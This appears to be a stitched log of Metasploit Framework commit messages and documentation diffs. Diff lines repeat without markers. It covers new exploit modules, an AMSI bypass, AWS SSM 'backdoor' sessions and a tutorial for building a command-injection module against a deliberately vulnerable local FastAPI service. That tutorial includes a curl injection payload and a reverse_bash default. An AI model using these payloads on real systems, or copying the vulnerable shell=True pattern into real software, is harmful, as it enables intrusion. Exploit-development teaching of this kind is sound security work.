This PR adds a variety of improvements to the
enum_computers module including shell and powershell
support as well as improvements to run on non-english
systems.
This PR adds a module that exploits a series of vulns
which leads to RCE on affected TorchServers tagrets. It
also includes updates the the class_loader library.
The URIPATH must end with / due to how the package names are requested
from the web server in a nested directory structure. #on_request_uri
also needed to be updated to check for the relative resource.
This PR updates metasploit-framework side for the
metasploit-payloads fix#672. This PR also includes
metasploit-framework PR #18445 which bumps the
metasploit-payloads gem version to 2.0.156.
Kibana before version 7.6.3 suffers from a prototype
pollution bug within the Upgrade Assistant. This PR adds
an exploit module to exploit the bug. There is no CVE
for this issue at the moment.
Change strings to reference `VMware` using the proper case. Don't
include CmdStager (because it's unnecessary). Set PrependFork to fix
shell payloads. Move CamelCase options to advanced.
* Reduce verbosity of log messages
* Move 'check_*' methods into 'check' method
* Fix non-existent Windows PowerShell Command payload
* Clearer log message for unpausing DAG in 'check_unpaused' method
This PR fixes a stack trace thrown by the forge_ticket
module when the SPN datastore option was left blank. The module
now fails due to bad-config and gives a detailed error message.
This PR adds a module for an unauthenticated RCE vulnerability
in Maltrail, a malicious traffic detection system. This vuln
does not have a CVE associated with it.
This PR adds support for detecting whether a session is
running in a podman container and improves detection for
sessions running in Docker, LXC and WLS containers.
The connection needs to slowly send data to the remote end for
stability. Additionally, the `exit` command should be issued when
closing the connction so it is reset back to the logon prompt.
Windows shells require an extra configuration that when present still
doesn't offer either the cmd.exe or powershell session that MSF expects
but rather a SAC shell.
AWS EC2 Nitro instances (and possibly others) support serial proxy
over SSH using the Instance Connect API:
https://docs.amazonaws.cn/en_us/AWSEC2/latest/UserGuide/
connect-to-serial-console.html
This process consists of sending an SSH pubkey to the serial proxy
control plane, connecting to a well-known URL with the instance ID
and port number as username, and the SSH private key as credential.
The resulting session is a "fragile" SSH context which does not
tolerate Channel-closing, requiring some special handling in Msf to
safeguard the initial Net::SSH::CommandStream.
Implement a BindAwsInstanceConnect Handler which loads an SSH key
from the local FS or generates a new one on the fly, passes the
pubkey to the InstanceConnect API, and then establishes SSH comms
with the InstanceConnect SSH proxy.
Implement a AwsInstanceConnectBind to handle resulting connetions,
derived from SshCommandShellBind, with an updated #bootstrap which
avoids meddling with the fragile CommandStream/Channel.
Testing:
Got serial console to the ttyS0 login prompt of a Nitro EC2 VM.
Logged in using previously-known credentials.
Verified console operations.
Notes:
Handler keeps firing, same as the SSM session concern.
There is a limit to the number of sessions which an instance can
hold (possibly only one).
This updates the aarch64 payloads to include comments with the
corresponding instructions for each little-endian integer. It also fixes
the debug output for x64 payloads under rosetta.
This module exploits a vulnerability in pfSense version
2.6.0 and below which allows for authenticated users to
execute arbitrary operating systems commands as root.
* Msftidy complains about Line 2 of the exploit template comment having
* http:// protocol instead of https:// protocol
* Reference in PR #18170, commit hash ad0d3e79, where Msftidy lint test fails
* to pass, but in the next commit 591fee18, the test passes.
* Small fixes in Description - removed backticks
* Implemented Windows Command target
* Removed PowerShell Stager, in Targets and in exploit method
* Implemented Rex::Socket::Tcp in place of TCPSocket
* Updated TARGET section in documentation
* Added TARGET 0 - Windows Command scenario
* Removed PowerShell Stager scenario
* Replaced 'Using configured payload' lines to use Windows Command payload
for the 2nd, 3rd, and 4th scenarios. Did not rerun the scenarios, however
The _AppDomainPtr, _AssemblyPtr and _MethodInfoPtr variables are COM smart pointers which will auto-Release() when they go out of scope, so we should not directly Release() them.
This reverts commit f97ab80224, reversing
changes made to c8f942cc03.
This change impacted the default `psexec` powershell target and needs further
testing to be reintroduced.
This adds support for the dyld changes incorperated into Sonoma and
cleans up the existing support for Ventura. This does not break
compatibility with previous versions.
This adds support for the dyld changes incorperated into Ventura which
includes changes to the symbols used. This does not break compatibility
with previous versions.
This commit adds the sign method to Payload::MachO which performs a
basic SHA256 signature update on the provided macho to enable it to run
under osx aarch64 systems.
This builds on Back from the dyld by adding the required aarch64
assembly code to enable the OSX loader to run on the m1. This enables
the use of native payloads on M1 or M2 devices that do not have Rosetta
installed.
When the entry point is after the payload, there woud occassionally be
cases where `poff` and `eidx` to be invalid, causing `entry` to be
truncated. `poff` should never be negative and `eidx` should reserve the
256 bytes that `entry` may occupy.
The script generated by the web_delivery module is blocked
by the Antimalware Scan Interface (AMSI) on newer versions
of windows. This PR allows the script to bypass AMSI.
Get all instances if limit is not set, improve output slightly.
Note: `inst.network_interfaces.select {|iface| iface.association}`
appears to have problems with multiple calls at run time - says
that the AWS SDK is trying to call `:[]` on `nil` but works in Pry.
Move debugging info into same file and make markdown match standards
Add more info on Pry debugging using Alan David Foster's explaination
Fix up broken URL links and format new URL links correctly
Fix up formatting and add information on Debug.gem supported commands
* Update modules landed as a scanner into a more appropriate category.
* Adds a check method based on TP-link default `TITLE` html.
* Rename module consistent with existing exploit.
Previously there was not the ability to restore the server proxy setting.
This updates the code to do so. Additionally this also updates the documentation
to note that Fetch payloads are incompatible with this module since they
use HTTP connections that will be impacted by this module changing the server's
HTTP proxy settings. There is no way around this.
The size requriement is used when the adapted payload is executed from
the command line but that's not the case for the fetch payloads which
execute a command to fetch the payload from a URL. The payload size
doesn't matter because it's included in the executable file hosted at
the URL.
* Prevent using post modules with the session
It doesn't work reliably because of winpty and how the output is
mangled.
* Set the limit correctly
* Fix Linux PTY downgrade issues
* Remove filtering
The filtering implementation is incomplete and unnecessary.
Filtering is unnecessary because Linux sessions execute a stub on
session start up that uses a combiantion of stty and a fifo to emulate a
PTY-less session. Windows sessions do not need filtering because they
have been explictly marked as being incompatible with the Post API which
is confused by the extra characters.
The filtering implementation is incomplete because it does not account for
echo fragments that are split across lines. It also does not account for
all of the ANSI escape codes.
* Add module docs for enum_ssm
The function required a filter argument, but not every query has a
filter. By removing it, we can reuse the same logic for other operations
including modifications.
* Revert "shell_command_token_base get 0th output index"
This reverts commit 3a4cb3560f.
* Correct the order of arguments to #set_term_size
* Fix paths for directory checks
The path C:\ ends with a trailing backslash which will cause bash to
wait for another line if input. This places the shell in an undesirable
state.
* Fix post module tests for Linux
* Remove the command document
This hasn't been tested and it's unclear under what conditions this
would be used.
* Fix Windows SSM sessions
---------
Co-authored-by: Spencer McIntyre <zeroSteiner@gmail.com>
- Put all the error-disabling statements on a single line
- Remove some useless spaces
- Use `stristr(…)` (available since PHP4) instead of `strpos(strtolower(…))`
- Use `&&` instead of `and`
- Use backticks instead of `passthru`, since they're equivalent: https://www.php.net/manual/en/language.operators.execution.php
* Improve base login scanner to catch any Exception
* Catch any Exception in SNMP scanner that overrides base method
* Expand connection errors possible in PostgreSQL scanner
Update the enum_ssm module to use the correct session type with the
appropriate platform. Also set the session information to the same
string which also removes the eye sore that is the shell banner.
Fixed some typos, took into account the comment from jvoisin to infer fields from the JSON reply, used fail_with as suggested by jheysel-r7, fixed a rubocop warning about a redundant begin block.
Update the enum_ssm module to use the correct session type with the
appropriate platform. Also set the session information to the same
string which also removes the eye sore that is the shell banner.
Create an AwsSsmCommandShellBind session type to provide intercept
points for shell command interactions and a wrapper class which is
used to register the new session.
Update Msf::Handler::BindAwsSsm with its own #create_session method
utilizing the new session type to provide direct control of session
initialization.
Restore standard handler attributes and thread nomenclature in an
attempt to resolve the repeating session creation when #to_handler
is called on the payloads.
Testing:
Tested in local framework, unfortunately the recurring session
init problem appears to persist. Requesting testing on an upstream
Framework by saner folks.
Update SSM handler code to standardize datastore option names per
@zeroSteiner.
Update payload modules to reflect the OS targets against which they
are to execute.
Bail out of console resize operation if ::IO.console doesn't exist
Enforce REGION datastore option and remove the multi-region enum
code by Aaron - users can write resource scripts if they need
automation.
Expand SSM enumeration module docs to explain full functionality.
Enable the LIMIT configuration option to restricte results per
region.
Implement FILTER_EC2_ID configuration option to permit targeting
of a specific instance for session initiation.
Testing:
Finds limtied sets of systems and initiates sessions
Finds desired system ID and initiates session
The SSM session socket times out without data being sent at the
upper (SSM) WS layer. Implement keep-alive in a separate thread
which simply writes nothing into the channel at irregular intervals
to simulate user activity.
Testing:
Sessions established with this code running have not timed-out
in over 15m despite being completely unused
Enable session acquisition from AWS SSM enumeration module simiar
to how the telnet login scanner acquires sessions on the sockets
exposed.
Testing
Tested execution - finds systems, gets shells, autopwn-capable
Coopt Aaron Soto's EC2 enum module & replace the guts with an SSM
query for not-terminated EC2 instances with SSM capability. This
will proide users with the instance IDs needed to test their SSM
shells and can be expanded to report information or even act as a
"brute-force" module which automatically starts SSM sessions.
Testing:
None - might eat your monitor lizard
Implement terminal resizing to WebSocket shell
Reorganize code to ease later extension
Implement peerinfo in channel context from AWS EC2 SSM information
gathered during session validation
Implement echo-filtering for session inputs (hacky, but works)
Testing:
Verified console resizing, color/reset/etc
Verified peerinfo and interaction
Verified common session operations
Notes:
SSM WebSocket sessions time out pretty quickly, implementing
dedicated SSM session types which support suspend/resume to match
backgrounding/foregrounding operations in the console should help
to resolve this. Alternatively, a keep-alive using empty frames
may be implemented in the SsmChannel itself on a separate thread.
Alter WebSocket::Interface::Channel to accept a mask_write flag to
set the Channel behavior for outgoing data (since the on_data_write
handler can only deal with the buffer provided, not how the wsframe
containing it is written to the "wire"). Set the flag to false for
SSM's WebSocket operations.
Extract Rex::Proto::Http::WebSocket::AmazonSsm from the handler to
permit reuse by other framework elements.
Implement SSM-specific UUID handling.
Create sane SsmFrame constructor to permit convenient operations.
Implement Http::WebSocket::AmazonSsm::Inteface::SsmChannel from
Http::WebSocket::Inferface::Channel with message-type handling and
output processing. Acknowledge incoming messages, process incoming
acknowledgements, increment sequence IDs appropriately, and handle
basic logging.
This new session type removes the 2500 char output restriction and
stateless peer cwd.
Testing:
Execution of handler now provides stateful interactive shells
Next steps:
More testing, preferably by other people with upstream framework.
Peerinfo and presentation updates for the session channel
Misc cleanup
Future work:
Implement new SSM session type with support for multi-console,
port-forwarding/socket routing, and custom SSM documents.
Implement FSM handlers for session suspension and resumption in
Http::WebSocket::AmazonSsm::Interface::SsmChannel
Create BinData structure to handle the proprietary format of AWS'
SSM WebSocket protocol. Implement relevant inter-field dependencies
and a virtual payload_valid field to handle the SHA256 digest check
for the current state of r the payload_data field.
Implement user-accessible SSM document definition to permit use of
custom-defined command and session documents (stubbing for session
types such as port-forwarding) which may be of use when dealing
with restrictive IAM.
Restructure handler in preparation for moving the WebSocket code
into Rex::Proto for use by other consumers such as custom payloads
and session types like fully interactive (vs REPL) modalities, or
some form of "cloud-native" MeterSSM.
Testing:
Verified acquisition of SSM WS frame and relevant field ops
Next Steps:
Create WS loop to abstract shell communications
Wrap in Rex*Abstraction bowties for the session handler
Test -> ? -> Profit
Using the implementation in https://github.com/humanmade/ssm, use
the onconnect websocket authenticator as a JSON string written as
a wstext Frame into the established WebSocket. This keeps the sock
open with AWS after returning it from the method, but subsequent
operations will require definition and encoding/decoding of SSM's
proprietary data structures.
Testing:
The initialized WebSocket is kept open and returns wsframes when
requested.
Next steps:
Port the various data structures from the JavaScript library
Implement encoding & decoding for their wire-level formats
Implement state management and data flow handling logic for
the WS SSM protocol.
Port WebSocket initiation routine from Exploit::Remote::HttpClient.
Currently inert since it appears to require a handshake procedure
along with its own type of data frame.
Implement graceful fail-down for session establishment which tries
to initiate a WebSocket session for proper functionality, failing
down to the script-execution style session abstraction if the WS
session does not marshal properly. Use this exception handling to
deal with the WIP WS session state.
Testing:
Gets the same kind of command-abstracted session as before
Interface-extended socket returns garbage from naive #write and
nothing from put_string or put_binary - not going to get anything
out of this thing until we establish the handshake procedure.
Next steps:
Figure out data frame structures for handshake and console IO
Implement handshake on-init, validate state
Implement IO abstraction for the resulting Channel for handoff
to #handle_connection
Amazon Web Services provides conveniently privileged backdoors in
the form of their SSM agents which do not require connectivity with
the target instance, merely valid credentials to AWS' API. Due to
this indirect "connection" paradigm, this mechanism can be used to
control otherwise "air-gapped" targets.
This approach abstracts asynchronous request/response parsing for
SSM requests into an IO channel with which the AWS SSM client is
then wrapped to emulate the expected Stream. The mechanism is rather
raw and could use better error handling, retries on laggy output,
and a threadsafe cursor implementation. It may be possible to start
an actually interactive session using the #start_session method in
the AWS client library, but so far testing has not yielded positive
results.
There is a significant limitation with these sessions not present
in normal stream-wise abstractions: a response limit of 2500 chars.
This limitation can be overcome by utilizing an S3 bucket to store
command output; however, due to the nature of access we seek to
obtain, it would not only add to the logged event loads but retain
the results of our TTPs in a "buffer" accessible to other people.
This functionality can be added down the line in the form of S3
config options in the handler to be passed into the SSM client for
command execution and acquisition of output.
Testing:
Gets sessions, provides command IO, leaves a bunch of log entries
in CloudTrail (something to keep in mind for opsec considerations).
Next steps:
Reorganize our WebSocket code a bit to provide connection and WS
state management inside Rex::Proto::Http::Client which can then be
exposed to the Handler without having to mix-in other namespaces
from Exploit.
Use the #start_session SSM Client method to extract the WS URL
for the relevant channel, and utilize that as the underpinning for
our session comms.
@@ -93,7 +93,7 @@ One advantage that this directory structure gives us is the ability to write bet
### Shared build tasks
Because all routine module-oriented tasks will be preformed with rake tasks, we will need to make the default actions for these tasks as intelligent and reusable as possible across different module types/implementations. A module author should not have to worry about writing plumbing they do not need (or is common) or messing with plumbing that is only tangentially related to their unique need. To that end, we should have sane defaults for the following at a minimum:
Because all routine module-oriented tasks will be performed with rake tasks, we will need to make the default actions for these tasks as intelligent and reusable as possible across different module types/implementations. A module author should not have to worry about writing plumbing they do not need (or is common) or messing with plumbing that is only tangentially related to their unique need. To that end, we should have sane defaults for the following at a minimum:
```
rake run -- Start module, hook up stdin/stdout to JSON-RPC
@@ -115,4 +115,4 @@ At the very least, we will also need tooling to create a mostly-empty but runnab
### For classic modules
The biggest differences for classic modules are metadata generation and running. These can be accomplished with rake tasks, but it would involve starting up a whole framework instance for each module run. For efficiency, we will need to signal to framework to treat the module specially, perhaps having rake deps:check output/return a specific value when the module needs to be run inside of framework. Metadata would then be dumped directly from the framework loader, and instead of rake run, the classic module loader/runner would be run much as it is today. We will probably want to keep the rake tasks for these things for when we don't already have a framework instance handy.
The biggest differences for classic modules are metadata generation and running. These can be accomplished with rake tasks, but it would involve starting up a whole framework instance for each module run. For efficiency, we will need to signal to framework to treat the module specially, perhaps having rake deps:check output/return a specific value when the module needs to be run inside of framework. Metadata would then be dumped directly from the framework loader, and instead of rake run, the classic module loader/runner would be run much as it is today. We will probably want to keep the rake tasks for these things for when we don't already have a framework instance handy.
2. Modify your `.git/config` file to enable signing commits and merges by default:
````
```ini
[user]
name=Your Name
email = your_email@example.com
@@ -114,7 +114,7 @@ Enter passphrase: [...]
[alias]
c=commit -S --edit
m = merge -S --no-ff --edit
````
```
Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit -- to resign the most recent, use `git c --amend`.
@@ -58,7 +58,7 @@ You probably shouldn't run proof of concept exploit code you find on the Interne
Also, please take a peek at our guides on using git and our acceptance guidelines for new modules in case you're not familiar with them.
If you get stuck, try to explain your specific problem as best you can on our [Freenode IRC](https://freenode.net/) channel, #metasploit (joining requires a [registered nick](https://freenode.net/kb/answer/registration)). Someone should be able to lend a hand. Apparently, some of those people never sleep.
If you get stuck, try to explain your specific problem as best you can on our [Freenode IRC](https://freenode.net/) channel, #metasploit (joining requires a [registered nick](https://freenode.net/view/Nick_Registration)). Someone should be able to lend a hand. Apparently, some of those people never sleep.
Enable faster implementation of SQL injection based explot modules by adding library support for common injection attack vectors. Currently very few sql injection exploits are implemented for Metasploit possibly due to the high complexity of building out injection queries and posting them to a vulnerable URI.
Enable faster implementation of SQL injection based exploit modules by adding library support for common injection attack vectors. Currently very few sql injection exploits are implemented for Metasploit possibly due to the high complexity of building out injection queries and posting them to a vulnerable URI.
Many testing techniques interacting with web servers such as `XSS` rely on ensuring authentication obtained on a target be kept active. A mechanism for regstering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authenticaion tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.
Many testing techniques interacting with web servers such as `XSS` rely on ensuring authentication obtained on a target be kept active. A mechanism for registering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authenticaion tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.
When preforming security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service.
When performing security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service.
Metasploit plugins can change the behavior of Metasploit framework by adding new features, new user interface commands, and more.
They are designed to have a very loose definition in order to make them as useful as possible.
Plugins are not available by default, they need to be loaded:
```msf
msf6 > load plugin_name
```
Plugins can be automatically loaded and configured on msfconsole's start up by configuring a custom `~/.msf4/msfconsole.rc` file:
```
load plugin_name
plugin_name_command --option
```
## Available Plugins
The current available plugins for Metasploit can be found by running the `load -l` command, or viewing Metasploit's [plugins](https://github.com/rapid7/metasploit-framework/tree/master/plugins) directory:
@@ -62,9 +62,9 @@ res = @http_client.send_request_cgi({
The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests.
### `cookie` option
Shown below is the request used to login to a gitlab account in the [artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)
Shown below is the request used to login to a gitlab account in the [artica\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)
artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection requires a specific cookie header to be sent with a request in order to achieve RCE. By setting a string of the desired header as the value of the `cookie` option, that string is set as the cookie header without any changes, allowing the exploit to be carried out.
artica\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection requires a specific cookie header to be sent with a request in order to achieve RCE. By setting a string of the desired header as the value of the `cookie` option, that string is set as the cookie header without any changes, allowing the exploit to be carried out.
@@ -38,7 +38,7 @@ For debugging purposes, it's always better to turn on the highest level of loggi
There are mainly five logging methods you will most likely be using a lot, and they all have the exact same arguments. Let's use one of the logging methods to explain what these arguments are about:
The first thing you do with ObfuscateJS is you need to initialize it with the JavaScript you want to obfuscate, so in this case, begin like the following:
```
```ruby
js = %Q|
var arrr = new Array();
arrr[0] = windows.document.createElement("img");
@@ -82,7 +82,7 @@ So if I want to obfuscate the variable ```arrr```, and I want to obfuscate the s
In some cases, you might actually want to know the obfuscated version of a symbol name. One scenario is calling a JavaScript function from an element's event handler, such as this:
```
```html
<html>
<head>
<script>
@@ -150,7 +150,7 @@ This time we'll do a "hello world" example:
And here's the output:
```
```javascript
window[(function () { var _d="t",y="ler",N="a"; return N+y+_d })()]((function () { var f='d!',B='orl',Q2='h',m='ello, w'; return Q2+m+B+f })());
@@ -128,7 +128,7 @@ The best way to let the user decide what kind of payload to use is by defining s
Here is an example targets section from a command injection module:
```
```ruby
'Targets' => [
[
'Unix Command',
@@ -279,7 +279,7 @@ msf exploit(cmdstager_demo) > run
# Flavors
Now that we know how to use the `Msf::Exploit::CmdStager` mixin, let's take a look at the command
stagers you can use. As mentioned above there are 2 general approaches to staging an executable on disk: by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them commands themselves to write it to disk like echo, printf, or vbs. This delineation can be important, as trying to wite a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit. It is also useful to know the `printf` flavor is the only flavor that embeds the payload into the commands but does ***not*** use `echo`.
stagers you can use. As mentioned above there are 2 general approaches to staging an executable on disk: by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them commands themselves to write it to disk like echo, printf, or vbs. This delineation can be important, as trying to write a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit. It is also useful to know the `printf` flavor is the only flavor that embeds the payload into the commands but does ***not*** use `echo`.
* **TCP::max_send_size** - Evasive option. Maximum TCP segment size.
* **TCP::send_delay** - Evasive option. Delays inserted before every send.
If you wish to learn how to change the default value of a datastore option, please read "[[Changing the default value for a datastore option|./How-to-use-datastore-options.md]]"
Of course, when you write a Metasploit browser exploit there's a lot more you need to think about. For example, your module probably needs to do browser detection, because it wouldn't make any sense to allow Chrome to receive an IE exploit, would it? You probably also need to build a payload that's specific to the target, which means your module needs to know what target it's hitting, and you have to build a method to customize the exploit accordingly, etc. The HttpServer and HttpServer::HTML mixin provies all kinds of methods to allow you to accomplish all these. Make sure to check out the API documentation (you can either do this by running msf/documentation/gendocs.sh, or just run "yard" in the msf directory), or checkout existing code examples (especially the recent ones).
Of course, when you write a Metasploit browser exploit there's a lot more you need to think about. For example, your module probably needs to do browser detection, because it wouldn't make any sense to allow Chrome to receive an IE exploit, would it? You probably also need to build a payload that's specific to the target, which means your module needs to know what target it's hitting, and you have to build a method to customize the exploit accordingly, etc. The HttpServer and HttpServer::HTML mixin provides all kinds of methods to allow you to accomplish all these. Make sure to check out the API documentation (you can either do this by running msf/documentation/gendocs.sh, or just run "yard" in the msf directory), or checkout existing code examples (especially the recent ones).
To get things started, you can always use the following template to start developing your browser exploit:
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
If you've found a way to execute a command on a target, and you'd like to make a simple exploit module to get a shell, this guide is for you. Alternatively, if you have access to **fetch** commands on the target (curl, wget, ftp, tftp, tnftp, or certutil), you can use a [[Fetch Payload|How-to-use-fetch-payloads]] for a no-code solution.
By the end of this guide you'll understand how to turn [Command injection](https://owasp.org/www-community/attacks/Command_Injection) into a shell - from here, you can move on to the [[command stager|How-to-use-command-stagers]] article and upgrade your basic `:unix_cmd` Target to a Dropper for all kinds of payloads with variable command stagers.
This guide assumes *some* knowledge of programming (Understand what a class is, what methods/functions are) but expects no in-depth knowledge of Metasploit internals.
## A Vulnerable Service
For the vulnerable service test case, we'll be using a simple FastAPI service. This is very easy to spin up:
1. Install `fastapi[all]` using your preferred Python package manager (a virtual environment is recommended)
2. Create a file to hold some Python code (I'll call it `main.py`)
3. Copy the following code into your file:
```python
from fastapi import FastAPI, Response
import subprocess
app = FastAPI()
@app.get("/ping")
def ping(ip : str):
res = subprocess.run(f"ping -c 1 {ip}", shell=True, capture_output=True)
4. Start your vulnerable service with `uvicorn main:app`
5. Test that the application works with `curl`:
```sh
$ curl http://localhost:8000/ping?ip=1.1.1.1
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.7 ms
--- 1.1.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 16.739/16.739/16.739/0.000 ms
```
6. Test that your application is exploitable - also with `curl`:
```sh
$ curl localhost:8000/ping?ip=1.1.1.1%20%26%26id
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.6 ms
--- 1.1.1.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 16.614/16.614/16.614/0.000 ms
uid=1000(meta) gid=1000(meta)
```
With this output `uid=1000(meta) gid=1000(meta)`, we know that the `id` command successfully executed on the target system. Now that we have a vulnerable application we can write a module to pwn it.
## The Structure of a Module
To have a functioning command injection Metasploit module we **need** a few things:
1. Create a subclass of `Msf::Exploit::Remote`
2. Include the `Msf::Exploit::Remote::HttpClient` mixin
3. Define three methods:
- `initialize`, which defines metadata for the Module
- `execute_command`, which is what runs the command against the remote server
- `exploit`, wraps `execute_command`, and can handle some logic when we move to a cmdstager module
4. (Not required, but recommended) a method to substitute or escape bad characters, to be used inside `execute_command`. This could also just be done inside `execute_command` instead of a separate function call.
### Where to put a Module
Metasploit looks for custom modules at `$HOME/.msf4/modules`, but the way you get modules there varies based on how you're running Metasploit.
- If you have a full install of Metasploit on your host, you can just add your custom module to `$HOME/.msf4/modules/exploits/custom_mod.rb`.
- You can also just add a module to Metasploit's modules folder - This can be helpful when troubleshooting, but it's not recommended
- **Docker** If you're using the [Docker Image](https://github.com/rapid7/metasploit-framework/tree/master/docker), you can also add modules to `$HOME/.msf4/modules` and that folder will be mounted as a volume inside the Docker container
- You can also change the mount point by modifying the [docker-compose](https://github.com/rapid7/metasploit-framework/blob/master/docker-compose.yml) file
For testing, the easiest thing to do is the simplest. You can find Metasploit's **exploit** directory, copy a file, rename it, and go from there.
## A Shell of a Module
The shell of a module that follows the above format is something like this:
```ruby
class MetasploitModule < msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
# empty for now
end
def filter_bad_chars(cmd)
# empty for now
end
def execute_command(cmd, _opts = {})
# empty for now
end
def exploit
# empty for now
end
end
```
This covers every essential point from [The Structure of a Module](#the-structure-of-a-module), although it won't run yet.
## Initialize
The `initialize` method is used to define and pass metadata. Every `initialize` method in the metasploit-framework codebase follows the format of an empty `info` being passed into `update_info`, which gets passed to the `msf::Exploit::Remote` `initialize` method:
```ruby
def initialize(info = {})
super(
update_info(
info,
# Here is where the metadata goes
'Name' => 'Command Injection against a test Ping endpoint',
'Description' => 'This exploits a command injection vulnerability against a test application',
'License' => MSF_LICENSE,
'Author' => 'YOUR NAME',
'References' => [
['URL', 'https://metasploit.com/']
],
'DisclosureDate' => '2023-08-04',
'Platform' => 'linux', # used for determining compatibility - if you're doing code injection, this may be the language of the webapp
'Targets' => [
'Unix Command',
{
'Platform' => ['linux', 'unix'], # linux and unix have different cmd payloads, this gives you more options
'Arch' => ARCH_CMD,
'Type' => :unix_cmd, # Running a command - this would be `:linux_dropper` for a cmdstager dropper
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash',
'RPORT' => 8000,
}
}
],
'Payload' => {
'BadChars' => '\x00',
}
'Notes' => { # Required for new modules https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
# Some more metadata options are here: https://docs.metasploit.com/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#code-example-of-references-in-a-module
)
)
end
```
All that this method does is register metadata to the module.
## Filtering
It's important to ensure that payloads being sent are properly encoded. As an example, if you send a request to the `/ping` endpoint that looks like `/ping?ip=1.1.1.1&&id`, you won't see the "uid=1000(meta) gid=1000(meta)" in the response because `&` is a special character in HTTP.
Encoding requirements might change based on the application you're trying to inject, so experiment if things aren't working.
```ruby
def filter_bad_chars(cmd)
return cmd
.gsub(/&/, '%26')
.gsub(/ /, '%20')
end
```
`filter_bad_chars` takes in `cmd`, which is a string. `cmd` has two substitutions applied - the first will translate `&` to `%26`, the second translates a space to `%20`. The `.gsub` statements are a global substitution across the string, so the entire payload is impacted by the substitutions here (Similar to str.replace in Python). Regardless of whether or not the string is modified, it is returned.
## Execution
The `execute_command` method takes in `cmd` and `_opts` and executes the command on the target. In our case, executing a command is simply adding the command to a GET request and sending it to the `/ping` endpoint on our sample service.
We don't even need to handle the output of `send_request_cgi` (Really, there should be no return until the shell exits, since the call to `subprocess.run` doesn't return until that shell dies).
## Exploitation
To finish up, all we need is to define the `exploit` method. This method is called by Metasploit when you use `run` within a msfconsole. All that we'll do here is print a little status message and run the exploit, but later you can modify this method to handle droppers as well:
```ruby
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
execute_command(payload.encoded)
end
```
If you're running Metasploit and the vulnerable Python service on the same machine, you should be able to simply set the variables and fire:
```sh
set RHOST 127.0.0.1
set LHOST 127.0.0.1
run
```
## Conclusion
That's it. Put it all together and you have a very simple Command Injection exploit module that shows you the basics of how to throw a payload. Play around with different payloads, follow the [[How-to-use-command-stagers]] guide, add some logging to the Python web server, and watch executions over Wireshark. You'll learn a lot.
@@ -54,16 +54,16 @@ In addition, we're going to add a magical line to the config file that will let
So, open up `metasploit-framework/.git/config` with your favorite editor, add an upstream remote, and add the pull request refs for both your and Rapid7's forks. In the end, you should have a section that started off like this:
Some people like to copy these over into remotes named "rapid7" and "yourusername" just so they don't have to remember about "origin" and "upstream," but for this doc, we'll just assume you have "origin" and "upstream" defined like this.
Now, you can git fetch the remote PRs. This will take a little bit, since we have a couple dozen MBs of pull request data. Storage is cheap, though, right?
````
```
$ git fetch --all
Fetching todb-r7
remote: Counting objects: 13, done.
@@ -97,7 +97,7 @@ From https://github.com/rapid7/metasploit-framework
You can `git fetch` a remote any time, and you'll get access to the latest changes to all branches and pull requests.
